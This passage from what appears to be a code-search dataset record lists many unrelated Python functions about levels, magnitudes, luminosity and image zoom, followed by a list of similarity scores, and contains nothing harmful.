if entity.is_max_level():\n return 'Maxed'\n if entity.max_level is not None:\n return '{entity.level}/{entity.max_level}'.format(entity=entity)\n return entity.level", "def getLevel(self):\n return self.level", "def extract_level_from_name(self):\n images = glob.glob(os.path.join(self.frame_dir, '*'))\n level = []\n for i, im in enumerate(images):\n base, tail = os.path.split(im)\n name = tail.split('.')[-2]\n number = name.split('_')[-1]\n level.append(float(number))\n return np.array(level)", "def get_prior_mag(mag_dict):\n print(\"GETTING MAGNITUDE\")\n print(mag_dict)\n print(type(mag_dict))\n mag = 17\n if not isinstance(mag_dict, dict):\n print(\"Not a dictionary so using mag=17\")\n return mag\n\n for k, v in mag_dict.items():\n mag = v['mag']\n\n try:\n mag = float(mag)\n except Exception as e:\n print(str(e), \"Error getting magnitude\")\n mag = 17\n print(mag)\n return mag", "def getLevels():", "def get_level_size(slide, level):\n return slide.level_dimensions[level]", "def get_level(self, level):\n return", "def read_slide_at_mag(slide, mag):\n exact_level = get_level_for_mag(slide, mag)\n if exact_level is not None:\n return slide.read_region((0,0), exact_level, get_level_size(slide, exact_level))\n else:\n max_size = slide.dimensions\n region_size = tuple(get_size_for_mag(slide, mag))\n downsample = np.average([max_dim/region_dim for max_dim, region_dim in zip(max_size, region_size)])\n best_level = slide.get_best_level_for_downsample(downsample)\n best_level_size = get_level_size(slide, best_level)\n best_level_img = slide.read_region((0,0), best_level, best_level_size)\n return best_level_img.resize(region_size, resample = Image.BICUBIC)", "def get_mag(self):\n raise NotImplementedError", "def _calculate_magnification(self, times):\n if self._model.n_lenses == 2:\n factor = 10.\n 
params = self._model.parameters\n t_1 = params.t_0 - factor * params.t_E\n t_2 = params.t_0 + factor * params.t_E\n self._model.set_magnification_methods([t_1, 'VBBL', t_2])\n self._model.set_default_magnification_method(\n 'point_source_point_lens')\n\n magnification = self._model.magnification(times)\n return magnification", "def get_level(level_name):\n return LEVELS[level_name.upper()]", "def test_changeIlluminationLevel(self):\n fade_to_black = \"Your environs fade to black due to Ineffable Spooky Magic.\"\n no_change = \"You do it. Swell.\"\n dark_to_light = \"Your environs are suddenly alight.\"\n brighten = \"Your environs seem slightly brighter.\"\n endarken = \"Your environs seem slightly dimmer.\"\n Manipulator.createFor(self.playerWrapper.actor)\n\n self._test(\n \"illuminate 0\",\n [fade_to_black],\n [fade_to_black])\n\n ll = self.store.findUnique(\n objects.LocationLighting,\n objects.LocationLighting.thing == self.location)\n self.assertEquals(ll.candelas, 0)\n\n self._test(\n \"illuminate 0\",\n [no_change])\n self.assertEquals(ll.candelas, 0)\n\n self._test(\n \"illuminate 100\",\n [dark_to_light],\n [dark_to_light])\n self.assertEquals(ll.candelas, 100)\n\n self._test(\n \"illuminate 110\",\n [brighten],\n [brighten])\n self.assertEquals(ll.candelas, 110)\n\n self._test(\n \"illuminate 100\",\n [endarken],\n [endarken])\n self.assertEquals(ll.candelas, 100)\n\n self._test(\n \"illuminate 0\",\n [fade_to_black],\n [fade_to_black])\n self.assertEquals(ll.candelas, 0)", "def get_multiplier(quality):\n\n if quality == \"low\":\n return 5\n elif quality == \"medium\":\n return 6\n elif quality == \"good\":\n return 7\n elif quality == \"high\":\n return 8\n return 6", "def difficulty(mag):\n mag = float(mag)\n if mag <= -4:\n return \"Visible in daytime.\"\n elif mag <= 6:\n return \"Visible at night.\"\n else:\n flux = mag_def(\"%s x\" % mag)\n needed_flux = mag_def(\"6 x\")\n eye_area = math.pi * (0.005**2)\n needed_power = needed_flux * eye_area\n diameter = 2 * math.sqrt(needed_power / (flux*math.pi))\n return \"%s m telescope needed.\" % diameter", "def getNativeMagnification(self):\n return self._nativeMagnification.copy()", "def get_levels(self):\n return self.levels[self.game]", "def track_moisture_level():\n try:\n normal_level_init = 470\n low_level_init = 560\n\n global LIMIT_FLAG\n sensor_read = sensorData.read_moisture()\n generate_json.define_structure(\"moisture\", sensor_read)\n\n if sensor_read > low_level_init:\n if LIMIT_FLAG != 3:\n # When it is dry (Moisture Level Low)\n LIMIT_FLAG = 3\n blynk.notify('Moisture Level Low! Irrigation Needed')\n blynk.email('brunocpp@gmail.com', 'Alert: Moisture Level Low',\n 'Moisture Level Low! 
Irrigation Needed')\n logging_write()\n elif normal_level_init <= sensor_read <= low_level_init:\n if LIMIT_FLAG != 2:\n LIMIT_FLAG = 2\n logging_write()\n else:\n if LIMIT_FLAG != 1:\n LIMIT_FLAG = 1\n logging_write()\n return sensor_read\n\n except Exception as e:\n logging_write(e)", "def get_map_size(level):\n if level < 5:\n return 5, 5\n if level < 70:\n return 10, 10\n if level < 150:\n return 25, 25\n return 50, 50", "async def get_xp(level, command):\n if command == \"profile\":\n return 250 * level\n return int((2 * 350) * (2 ** (level - 2))) # 350 is base value (level 1)", "def _calc_refinement_level(coords, well_loc, radius_per_level, max_level):\n if len(coords) != len(well_loc):\n raise ValueError('Unmatching dimensions for cell or well coordinates.')\n\n diff = (np.abs(np.array(coords) - np.array(well_loc))) // radius_per_level\n return max_level - np.max(diff)", "def _magsamples(self):\n if self._derived_properties[\"magsamples\"] is None:\n if self.lbda is None:\n raise AttributeError(\"lbda not set.\")\n self.derive_magsamples()\n \n return self._derived_properties[\"magsamples\"]", "def get_food_level(self):\n return self.plant", "def find_level(self, prefix):\n if re.match(self.raw, prefix):\n return 'rawLevel', self.find_sample(self.raw, prefix)\n elif re.match(self.run, prefix):\n return 'runLevel', self.find_sample(self.run, prefix)\n elif re.match(self.sample, prefix):\n return 'sampleLevel', self.find_sample(self.sample, prefix)\n elif re.match(self.agg, prefix):\n return 'aggLevel', self.find_sample(self.agg, prefix)\n else:\n raise ValueError(\"Can't find a match for %s\" % prefix)", "def estimate_phones(x):\n if x['mean_luminosity_km2'] > 5:\n return 10\n elif x['mean_luminosity_km2'] > 1:\n return 5\n else:\n return 1", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def get_vol_lvl(self):\n global volume\n #output = subprocess.check_output(['amixer', 'sget', self.mixer_name]).decode('utf-8')\n return volume#int(output[(output.find('[') + 1):output.find('%]', (output.find('[') + 1))])", "def detail(self):\n return self.uniform(\"detail\",\n self.img_scale * .05,\n self.img_scale * .2)", "def _determine_level(levels, points):\n import operator\n level = None\n sorted_levels = sorted(levels.iteritems(), key=operator.itemgetter(1))\n for el in sorted_levels:\n if points <= el[1]:\n level = el[0]\n break\n\n max_level = max(levels.iterkeys(), key=lambda threshold: levels[threshold])\n if points >= levels[max_level]:\n level = max_level\n return level", "def magnitude(x):\n return x.magnitude if hasattr(x, 'magnitude') else x", "def _get_depth_map_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Depth/0.125/\"\n else:\n return \"Depth/0.25/\"\n else: \n return \"Depth/\"", "def flux_hack(self):\r\n return self.planes[1].galaxies[0].light_profiles[0].flux", "def difficulty_for_level(level):\n return 0 if level==\"easy\" else (1 if level==\"medium\" else 2)", "def getMeasure(unique_name):", "def getMeasure(unique_name):", "def lphot(self):\n return self._get_mean_and_samples_attribute('lphot')", "def lookup_median(lender, metro):\n if lender:\n lender_str = lender.institution_id\n if metro:\n stat = LendingStats.objects.filter(\n institution_id=lender_str, geo_id=metro.geoid).first()\n if stat:\n return stat.lar_median\n return calculate_median_loans(lender_str, metro)", "def 
__get_maidenhead(self, level):\n \n mh_resp = {'grid': None, 'lock': False}\n loc = self.__get_gps_location()\n\n if loc['lock']:\n mh_resp['lock'] = True\n mh_resp['grid'] = mh.to_maiden(loc['lat'], loc['lon'], precision=level)\n\n return mh_resp", "def get_level(tag: str) -> int:\n return TAG_LEVELS[tag]", "def level(self):\n return self.__pin.pwm", "def lookup_clutter_geotype(geotype_lookup, population_density):\n\n highest_popd, highest_geotype = geotype_lookup[0]\n middle_popd, middle_geotype = geotype_lookup[1]\n lowest_popd, lowest_geotype = geotype_lookup[2]\n\n if population_density < middle_popd:\n return lowest_geotype\n\n elif population_density > highest_popd:\n return highest_geotype\n\n else:\n return middle_geotype", "def get_info(self, level):\n\n # see if we can open the tile info file.\n info_file = os.path.join(self.tile_dir, '%02d' % level,\n self.TileInfoFilename)\n try:\n fd = open(info_file, 'rb')\n except IOError:\n return None\n\n # OK, looks like we actually do have this level!\n info = pickle.load(fd)\n fd.close()\n\n return info", "def get_no_strat_levels(no_vert_levels_atmos):\n try:\n if float(no_vert_levels_atmos) > 60:\n no_strat_levels = '20'\n else:\n no_strat_levels = '10'\n except:\n no_strat_levels = '10'\n\n return no_strat_levels", "def _do_get_level(self):\n logging.info(__name__ + ' : Read level of channel 1')\n result = self._execute('R1')\n return float(result.replace(\"R\", \"\")) / 10", "def level(self):\n return self.init_v[2]", "def read_level(self):\n current_level = 1\n\n try:\n if self.store.exists(LEVEL_STORE):\n current_level_str = self.store.get(LEVEL_STORE)['level']\n current_level = int(current_level_str)\n except:\n print 'Exception when reading Galaxy run level from JSON file!'\n current_level = 1\n\n return current_level", "def level(self):\n return self.game_data['player stats']['Level']", "def map_roi_levels(self, rois, num_levels):\r\n scale = torch.sqrt(\r\n (rois[:, 3] - rois[:, 1] + 1) * (rois[:, 4] - rois[:, 2] + 1))\r\n target_lvls = torch.floor(torch.log2(scale / self.finest_scale + 1e-6))\r\n target_lvls = target_lvls.clamp(min=0, max=num_levels - 1).long()\r\n return target_lvls", "def _get_normal_map_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Normals/0.125/\"\n else:\n return \"Normals/0.25/\"\n else: \n return \"Normals/\"", "def get_luminosity(self, vel_disp):\n\t\tlog_L_V = self.slope*np.log10(vel_disp) + self.intercept\n\t\treturn log_L_V", "def normalize_zoomlvl(lvl):\n if lvl < gMinZoomLevel:\n return gMinZoomLevel\n elif lvl > gMaxZoomLevel:\n return gMaxZoomLevel\n else:\n return lvl - gMinZoomLevel", "def mag_err(self):\n return self.photosamplers.get_estimate(mag=True)[1:]", "def get_estimate(self, mag=False):\n if mag is False:\n return super(PhotoSamplers,self).get_estimate()\n \n return self._magsamples.get_estimate()", "def mab0(self):\n return GALEX_INFO[self.bandname][\"ABmag0\"]", "def get_tile_at_position(level, position):\n size = level_size(level)\n index = position_to_index(position, size)\n return level[index]", "def getCorona(self):\n return self.corona_level", "def get_level(text):\n m = re.search(LEVEL_PATTERN, text)\n if m:\n level = m.groups(0)[0]\n return level\n return UNKNOWN", "def getLevel(self, *args):\n return _libsbml.QualExtension_getLevel(self, *args)", "def getMaxLevel(self):\n return _libsbml.QualitativeSpecies_getMaxLevel(self)", "def get_number_of_atmos_levels(description):\n if description == \"none\":\n return \"0\", \"0\"\n elif 
re.search(\"levels\", description):\n match = re.search(\"(?P<nl>\\d+)\\s?(levels|vertical levels)\", description)\n nlevs = match.groupdict()[\"nl\"]\n if int(nlevs) > 49: nlas = \"20\"\n else: nlas = \"10\"\n return nlevs, nlas\n else:\n return \"40\", \"20\"", "def resolution(self):\n\t\tif self.name.endswith( '_LOW' ):\n\t\t\treturn 'LOW'\n\t\telif self.name.endswith( '_MID' ):\n\t\t\treturn 'MID'\n\t\telse:\n\t\t\treturn 'HIGH'", "def getLevel(self, channel, group=\"I\", stage=\"I\", unitCode=0):\n self.send(XAP800_CMD + str(unitCode) + \" LVL \" + str(channel) + \" \" +\n group + \" \" + stage + \" \" + EOM)\n return float(self.readResponse())", "def get_levelID(self):\n return self.levelID", "def getLevel(self, *args):\n return _libsbml.MultiExtension_getLevel(self, *args)", "def get_modifier(path, lfdb):\n (cam, lens) = get_cam_lens(path, lfdb)\n (width, height) = map(int, get_exif(path, 'ImageSize').split('x'))\n return lensfunpy.Modifier(lens, cam.crop_factor, width, height)", "def getType(level):\n randomId = random.randint(1, WEIGHT[level])\n return getByWeight(POSSIBLE_TYPES[level], randomId)[0]", "def get_hero_level(self, uuid, hero):\n\n return self.template(uuid, \"lastLevel_\" + hero)", "def luminosity(r,T,autoDebug=True):\n\t#-----------BEGIN ERROR CHECKING----------\n\tif autoDebug:\n\t\tsam.type_check(r, sam.TYPES_math, \"r\")\n\t\tsam.type_check(T, sam.TYPES_math, \"T\")\n\t\tsam.value_check(r,.0,\">\",\"r\")\n\t\tsam.value_check(T,.0,\">\",\"T\")\n\t#-----------END ERROR CHECKING----------\n\n\tL = 4 * sam.CONSTANT_pi * r**2 * sam.CONSTANT_SB* T**4\n\treturn L", "def _get_med(self):\n return self.__med", "def use_level(self, level):\n\n if self.min_level <= level <= self.max_level:\n map_extent = self.tiles.use_level(level)\n if map_extent:\n self.level = level\n (self.map_width, self.map_height,\n self.ppd_x, self.ppd_y) = map_extent\n (self.map_llon, self.map_rlon,\n self.map_blat, self.map_tlat) = self.tiles.extent\n\n # do level change callback\n self.handleLevelChangeCallback(level)\n\n return True\n\n return False", "def weaponValue(self, level):\n if level == 1:\n bonus = 2\n elif level == 2:\n bonus = 4\n elif level == 3:\n bonus = 6\n elif level == 4:\n bonus = 8\n else:\n bonus = 0\n\n return bonus", "def getSupportResistanceLevels(self):\n return self.levels", "def get_mlt_phys(sed_name):\n\n new_name = sed_name.replace('+','-').replace('a','-').split('-')\n\n logg_sgn_dex = len(new_name[0])\n\n if sed_name[logg_sgn_dex] == '-':\n logg_sgn = 1.0\n elif sed_name[logg_sgn_dex] == '+':\n logg_sgn = -1.0\n else:\n raise RuntimeError('Cannot get logg_sgn for %s' % sed_name)\n\n metallicity_sgn_dex = len(new_name[0]) + len(new_name[1]) + 1\n\n if sed_name[metallicity_sgn_dex] == '-':\n metallicity_sgn = -1.0\n elif sed_name[metallicity_sgn_dex] == '+':\n metallicity_sgn = 1.0\n else:\n raise RuntimeError('Cannot get metallicity_sgn for %s' % sed_name)\n\n teff = 100.0*float(new_name[0][3:])\n metallicity = metallicity_sgn*float(new_name[2])\n logg = logg_sgn*float(new_name[1])\n\n return teff, metallicity, logg", "def get_level(command):\n if is_delete(command):\n return None\n elif is_get(command):\n return int(command.split(\" \")[2])\n elif is_insert(command) or is_update(command):\n return int(command.split(\" \")[3])", "def get_min_max(self, run_id):\n runs = self.repo.get_all_runs()\n levels = runs[['min_level', 'max_level']][runs['run_id'] == run_id]\n return levels", "def get_luminosities(self, annulus_ident: int, model: str, lo_en: Quantity = None, 
hi_en: Quantity = None) \\\n -> Union[Quantity, Dict[str, Quantity]]:\n # Checking the input energy limits are valid, and assembles the key to look for lums in those energy\n # bounds. If the limits are none then so is the energy key\n if all([lo_en is not None, hi_en is not None]) and lo_en > hi_en:\n raise ValueError(\"The low energy limit cannot be greater than the high energy limit\")\n elif all([lo_en is not None, hi_en is not None]):\n en_key = \"bound_{l}-{u}\".format(l=lo_en.to(\"keV\").value, u=hi_en.to(\"keV\").value)\n else:\n en_key = None\n\n # Checks that the requested region, model and energy band actually exist\n if len(self._luminosities[annulus_ident]) == 0:\n raise ModelNotAssociatedError(\"There are no XSPEC fits associated with this AnnularSpectra\")\n elif model not in self._luminosities[annulus_ident]:\n av_mods = \", \".join(self._luminosities[annulus_ident].keys())\n raise ModelNotAssociatedError(\"{m} has not been fitted to this AnnularSpectra; \"\n \"available models are {a}\".format(m=model, a=av_mods))\n elif en_key is not None and en_key not in self._luminosities[annulus_ident][model]:\n av_bands = \", \".join([en.split(\"_\")[-1] + \"keV\" for en in self._luminosities[annulus_ident][model].keys()])\n raise ParameterNotAssociatedError(\"A luminosity within {l}-{u}keV was not measured for the fit \"\n \"with {m}; available energy bands are \"\n \"{b}\".format(l=lo_en.to(\"keV\").value, u=hi_en.to(\"keV\").value, m=model,\n b=av_bands))\n\n # If no limits specified,the user gets all the luminosities, otherwise they get the one they asked for\n if en_key is None:\n parsed_lums = {}\n for lum_key in self._luminosities[annulus_ident][model]:\n lum_value = self._luminosities[annulus_ident][model][lum_key]\n parsed_lum = Quantity([lum.value for lum in lum_value], lum_value[0].unit)\n parsed_lums[lum_key] = parsed_lum\n return parsed_lums\n else:\n lum_value = self._luminosities[annulus_ident][model][en_key]\n parsed_lum = Quantity([lum.value for lum in lum_value], lum_value[0].unit)\n return parsed_lum", "def QualExtension_getDefaultLevel():\n return _libsbml.QualExtension_getDefaultLevel()", "def getLevel(self):\n return self._level", "def load_level(level):\n\n global spawn_boxes\n\n level = pytmx.load_pygame('maps/level_' + level + '.tmx')\n\n y_num = 0\n for x, y, gid in level.get_layer_by_name('Objects'):\n if level.get_tile_image_by_gid(gid) != None:\n matrix[y_num].append(1)\n else:\n matrix[y_num].append(0)\n \n if x == 19: y_num += 1\n\n spawn_boxes = [] # Areas in which enemies can spawn. 
Requires tiled type 'spawn_box'\n for obj in level.get_layer_by_name('Triggers'):\n if obj.type == 'spawn_box':\n rect = pygame.rect.Rect(obj.x, obj.y, obj.width, obj.height)\n if obj.name == 'north': \n rect = rect.move(0, -64)\n rect.height += 64\n if obj.name == 'east': \n rect = rect.move(64, 0)\n rect.width += 64\n if obj.name == 'south': \n rect = rect.move(0, 64)\n rect.height += 64\n if obj.name == 'west': \n rect = rect.move(-64, 0)\n rect.width += 64\n spawn_boxes.append(rect)\n\n return level", "def getLightSensor() -> int:\n pass", "def get_size_for_mag(slide, mag):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = max_mag/mag\n return [np.int(np.round(dim/downsample)) for dim in max_size]", "def galaxy(img):\n return img[420:490, 710:770]", "def sazelmag(source):\n if 1:\n # bizarre failures in s.azel() showing up on Mar 11, 2006....\n try:\n Azel = subarrayControl.s.azel(source, 0.0);\n except Exception, e:\n print \"Problem with s.azel(%s): %s\" %(source,e)\n return (source, 0, -10, 0)\n try:\n mag = subarrayControl.s.queryMag(source)\n except Exception, e:\n print \"Problem with queryMag(%s): %s\" %(source,e) \n return (source, 0, -10, 0)\n return ( source, Azel[0], Azel[1], mag)\n else:\n cmd = 'checksource source=%s comments=t sexa=f' % source\n # the 2nd (last) line contains all the info\n r=os.popen(cmd).readlines()[1].strip()\n rs=r.split()\n re=r.split('=')\n if len(re) == 2:\n mag=float(re[1])\n else:\n mag=-9.99\n return ( source, float(rs[3]), float(rs[4]), mag)", "def get_min_mag_edge(self):\r\n\t\treturn self.min_mag", "def getMagBoundary(self):\n\n # Get the boundary of magnitude based on the filter\n lowMagnitude = nan\n highMagnitude = nan\n if (self.filter == self.FilterU):\n lowMagnitude = 7.94\n highMagnitude = 14.80\n\n elif (self.filter == self.FilterG):\n lowMagnitude = 9.74\n highMagnitude = 16.17\n\n elif (self.filter == self.FilterR):\n lowMagnitude = 9.56\n highMagnitude = 15.73\n\n elif (self.filter == self.FilterI):\n lowMagnitude = 9.22\n highMagnitude = 15.26\n\n elif (self.filter == self.FilterZ):\n lowMagnitude = 8.83\n highMagnitude = 14.68\n \n elif (self.filter == self.FilterY):\n lowMagnitude = 8.02\n highMagnitude = 13.76\n\n return lowMagnitude, highMagnitude", "def get_level(k):\r\n return int(log2(k))", "async def _fetch_level_info(self) -> Level:\n \n memory = await self._read_memory()\n\n level_name = memory.get_level_name()\n level_creator = memory.get_level_creator()\n level_id = memory.get_level_id()\n\n level = Level(id=level_id, name=level_name,\n creator = level_creator)\n\n level.practice_mode = memory.is_practice_mode()\n\n level.attempts = memory.get_attempts()\n level.jumps = memory.get_jumps()\n level.difficulty = memory.get_level_difficulty()\n\n level.percent = math.floor(memory.get_percent())\n level.best_percent = math.floor(memory.get_normal_percent())\n\n level.practice_best = math.floor(memory.get_practice_percent())\n\n level.rating = memory.get_level_stars()\n level.featured = memory.is_level_featured()\n level.epic = memory.is_level_epic()\n\n return level", "def get_damage():\n\n return character['Damage']" ]
[ "0.76260245", "0.6262649", "0.62293607", "0.61587805", "0.60415137", "0.6033318", "0.58130866", "0.5732402", "0.57084596", "0.5647901", "0.5613819", "0.5604842", "0.5599045", "0.55820286", "0.5574072", "0.5559694", "0.55576396", "0.555535", "0.55302167", "0.5511368", "0.5494198", "0.54852396", "0.5452814", "0.54244727", "0.54218197", "0.5421613", "0.5416685", "0.54048425", "0.53021735", "0.52995604", "0.5284117", "0.5283781", "0.5277727", "0.52573913", "0.5250036", "0.52265453", "0.5196042", "0.51912636", "0.5171809", "0.51687026", "0.51603323", "0.5159297", "0.51288354", "0.5126065", "0.5124125", "0.5115915", "0.5115915", "0.5115366", "0.51039505", "0.5103442", "0.509526", "0.5091162", "0.50762963", "0.50423807", "0.50376505", "0.5027888", "0.5025514", "0.50210255", "0.50137115", "0.50037116", "0.49907872", "0.498121", "0.49792895", "0.49770924", "0.49746302", "0.49734712", "0.49700868", "0.49643868", "0.4958834", "0.49439278", "0.4940448", "0.49346963", "0.4932495", "0.49321303", "0.4929391", "0.49166372", "0.49131876", "0.49128357", "0.4912683", "0.49106142", "0.48932758", "0.48867613", "0.48858136", "0.48854262", "0.48837626", "0.48835748", "0.4878468", "0.48673624", "0.48672682", "0.48633555", "0.4849789", "0.48423553", "0.48389417", "0.48273817", "0.4826139", "0.48121336", "0.480901", "0.48081067", "0.48062953", "0.48022556" ]
0.7825988
0
Get the magnification corresponding to an image size at the highest magnification
def get_mag_for_size(slide, size):
    max_size = slide.dimensions
    max_mag = highest_mag(slide)
    downsample = np.average([max_dim/size_dim for max_dim, size_dim in zip(max_size, size)])
    return max_mag/downsample
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def highest_mag(slide):\n return int(slide.properties['aperio.AppMag'])", "def get_size_for_mag(slide, mag):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = max_mag/mag\n return [np.int(np.round(dim/downsample)) for dim in max_size]", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def getNativeMagnification(self):\n pixelInfo = self._tiffDirectories[-1].pixelInfo\n mm_x = pixelInfo.get('mm_x')\n mm_y = pixelInfo.get('mm_y')\n # Estimate the magnification if we don't have a direct value\n mag = pixelInfo.get('magnification') or 0.01 / mm_x if mm_x else None\n return {\n 'magnification': mag,\n 'mm_x': mm_x,\n 'mm_y': mm_y,\n }", "def _select_largest_photo(self, sizes):\n\n max_size = 0\n photo = ''\n for size in sizes:\n w = size['width']\n h = size['height']\n if w * h >= max_size:\n max_size = w * h\n photo = size['url']\n return photo", "def getZoomFactor(imageSize, maxW, maxH):\n\timageW, imageH = imageSize\n\tzoomW = float(imageW) / float(maxW)\n\tzoomH = float(imageH) / float(maxH)\n\treturn max(zoomW, zoomH)", "def get_mag(self):\n raise NotImplementedError", "def findMax(img):\n\td = minMaxLoc(img)\n\treturn {\"maxVal\":d[\"maxVal\"], \"maxLoc\":d[\"maxLoc\"]}", "def max_scale_image(self):\n maximum = np.argmax(self.transform, 0)\n return self.scale_array[maximum] * (self.support.sum(0) > 0)", "def get_min_mag_center(self):\r\n\t\treturn self.min_mag + self.bin_width / 2", "def mag(self) -> complex:\n return self.major_extent", "def _image_resolution(image_filename):\n img = mpimg.imread(image_filename)\n return img.shape", "def getNativeMagnification(self):\n return self._nativeMagnification.copy()", "def get_image_size(self):", "def _calculate_magnification(self, times):\n if self._model.n_lenses == 2:\n factor = 10.\n params = self._model.parameters\n t_1 = params.t_0 - factor * params.t_E\n t_2 = params.t_0 + factor * params.t_E\n self._model.set_magnification_methods([t_1, 'VBBL', t_2])\n self._model.set_default_magnification_method(\n 'point_source_point_lens')\n\n magnification = self._model.magnification(times)\n return magnification", "def get_resize_to(image, size_x, size_y):\n scale_x = image.shape[0] // size_x\n scale_y = image.shape[1] // size_y\n if scale_x == 0 or scale_y == 0:\n return 3, None\n if image.shape[0] % scale_x != 0 or image.shape[1] % scale_y != 0:\n return 1, None\n if image.shape[0] < scale_x or image.shape[1] < scale_y:\n return 2, None\n\n arrays = []\n for i in range(scale_x):\n for j in range(scale_y):\n arrays.append(image[i::scale_x, j::scale_y])\n\n result = mode(np.stack(arrays), axis=0).mode[0]\n if result.max() > 10:\n print(1)\n\n return 0, result", "def find_max(subimage):\r\n\tmax_val_subimage = np.nanmax(subimage)\r\n\treturn max_val_subimage", "def _get_extended_image_size(height, width, patch_size, stride):\n\n ext_height, ext_width = 0, 0\n\n def sliding_distance(n_windows, window_size, stride):\n return window_size * n_windows - (window_size - stride) * (n_windows - 1)\n\n if height < patch_size:\n ext_height = patch_size\n else:\n for n in range(height):\n distance = sliding_distance(n, patch_size, stride)\n if distance > height:\n ext_height = distance\n break\n\n if width < patch_size:\n ext_width = patch_size\n else:\n for n in range(width):\n distance = sliding_distance(n, patch_size, stride)\n 
if distance > width:\n ext_width = distance\n break\n\n return ext_height, ext_width", "def level_mags(slide):\n return [highest_mag(slide)/downsample for downsample in slide.level_downsamples]", "def getMagnification(self, pixelSize=0.0129, isFilter=False, erodeIter=None):\r\n\r\n if not hasattr(self, 'determinantMap'):\r\n _ = self._getDeterminantMap()\r\n\r\n if hasattr(self, 'finalPathesMarked'):\r\n finalPatches = self.finalPatchesMarked\r\n elif hasattr(self, 'finalPatches'):\r\n finalPatches = self.finalPatches\r\n else:\r\n self.processTrial()\r\n finalPatches = self.finalPatches\r\n\r\n magMap = 1 / self.determinantMap\r\n\r\n if isFilter:\r\n magMap = ni.filters.gaussian_filter(magMap, self.params['signMapFilterSigma'])\r\n\r\n # get mean power amplitude for all visual areas normalized by V1\r\n magDict = {}\r\n for key, patch in finalPatches.items():\r\n array = patch.array.astype(np.float)\r\n\r\n if erodeIter:\r\n array = ni.binary_erosion(array, iterations=erodeIter)\r\n\r\n area = np.sum(array)\r\n\r\n totalMag = np.sum(array * magMap)\r\n\r\n magDict.update({key: (pixelSize ** 2) * totalMag / area})\r\n\r\n return magDict", "def image_size(size):\n l_max = max(size)\n if l_max > 300:\n num = l_max/300\n else:\n num = 1\n w = round(size[0] / num)\n h = round(size[1] / num)\n new_size = [w, h]\n return new_size", "def _get_target_scale(self, im_size_min, im_size_max, target_size, max_size):\n im_scale = float(target_size) / float(im_size_min)\n # Prevent the biggest axis from being more than max_size\n if np.round(im_scale * im_size_max) > max_size:\n im_scale = float(max_size) / float(im_size_max)\n return im_scale", "def rscale(mag=10.0):\n if mag > 11.5:\n return 0.5\n elif mag > 11.0:\n return 1.0\n elif mag > 10.5:\n return 1.5\n elif mag > 10.0:\n return 1.5\n elif mag > 9.5:\n return 2.0\n elif mag > 9.0:\n return 2.5\n elif mag > 8.5:\n return 3.0\n else:\n return 3.5", "def getImageMax(self):\n fname = '%s::%s'%(self.__class__.__name__, self.getImageMax.__name__)\n if (not self.lhaveImage):\n print(\"%s: DSM image not yet computed\"%fname)\n return None, None\n maxIndex = c_int(1)\n maxValue = c_float(1)\n ierr = c_int(1)\n self.lib.xcloc_getImageMax(maxIndex, maxValue, ierr)\n if (ierr.value != 0):\n print(\"%s: Failed to get max value and index of DSM image\"%fname)\n return None, None\n imax = maxIndex.value - 1 # Fortran to C\n vmax = maxValue.value\n return imax, vmax", "def mag(self) -> float:\n return sqrt(self.sqr_mag())", "def CalculateMaxImageSize(self, partition_size):\n raise NotImplementedError", "def get_maxdist(self, pixel_size):\n\n total_area = self.minnpix_cluster*pixel_size**2.\n\n radius = ((np.sqrt(total_area)/2.))\n if radius > 1.0:\n radius = int(radius)\n else:\n radius = round_to_1(radius)\n dist = np.sqrt(2.*float(radius)**2.)\n dist = dist+(0.05*dist)\n\n return dist", "def scaled_image(width, height):\r\n total = width*height\r\n scale_dict = {0.2: 6500000, 0.3: 4000000, 0.4: 2250000, 0.5: 1000000, 0.8: 500000, 1: 0}\r\n for k, v in scale_dict.items():\r\n if total > v:\r\n return k", "def get_largest_two_component(img, print_info = False, threshold = None):\n s = ndimage.generate_binary_structure(3,2) # iterate structure\n labeled_array, numpatches = ndimage.label(img,s) # labeling\n sizes = ndimage.sum(img,labeled_array,range(1,numpatches+1)) \n sizes_list = [sizes[i] for i in range(len(sizes))]\n sizes_list.sort()\n if(print_info):\n print('component size', sizes_list)\n if(len(sizes) == 1):\n out_img = img\n else:\n if(threshold):\n 
out_img = np.zeros_like(img)\n for temp_size in sizes_list:\n if(temp_size > threshold):\n temp_lab = np.where(sizes == temp_size)[0] + 1\n temp_cmp = labeled_array == temp_lab\n out_img = (out_img + temp_cmp) > 0\n return out_img\n else: \n max_size1 = sizes_list[-1]\n max_size2 = sizes_list[-2]\n max_label1 = np.where(sizes == max_size1)[0] + 1\n max_label2 = np.where(sizes == max_size2)[0] + 1\n component1 = labeled_array == max_label1\n component2 = labeled_array == max_label2\n if(max_size2*10 > max_size1):\n component1 = (component1 + component2) > 0\n out_img = component1\n return out_img", "def get_largest_two_component(img, print_info = False, threshold = None):\n s = ndimage.generate_binary_structure(3,2) # iterate structure\n labeled_array, numpatches = ndimage.label(img,s) # labeling\n sizes = ndimage.sum(img,labeled_array,range(1,numpatches+1)) \n sizes_list = [sizes[i] for i in range(len(sizes))]\n sizes_list.sort()\n if(print_info):\n print('component size', sizes_list)\n if(len(sizes) == 1):\n out_img = img\n else:\n if(threshold):\n out_img = np.zeros_like(img)\n for temp_size in sizes_list:\n if(temp_size > threshold):\n temp_lab = np.where(sizes == temp_size)[0] + 1\n temp_cmp = labeled_array == temp_lab\n out_img = (out_img + temp_cmp) > 0\n return out_img\n else: \n max_size1 = sizes_list[-1]\n max_size2 = sizes_list[-2]\n max_label1 = np.where(sizes == max_size1)[0] + 1\n max_label2 = np.where(sizes == max_size2)[0] + 1\n component1 = labeled_array == max_label1\n component2 = labeled_array == max_label2\n if(max_size2*10 > max_size1):\n component1 = (component1 + component2) > 0\n out_img = component1\n return out_img", "def get_size(self, index):\n return self.image_sizes[index]", "def get_min_mag_edge(self):\r\n\t\treturn self.min_mag", "def 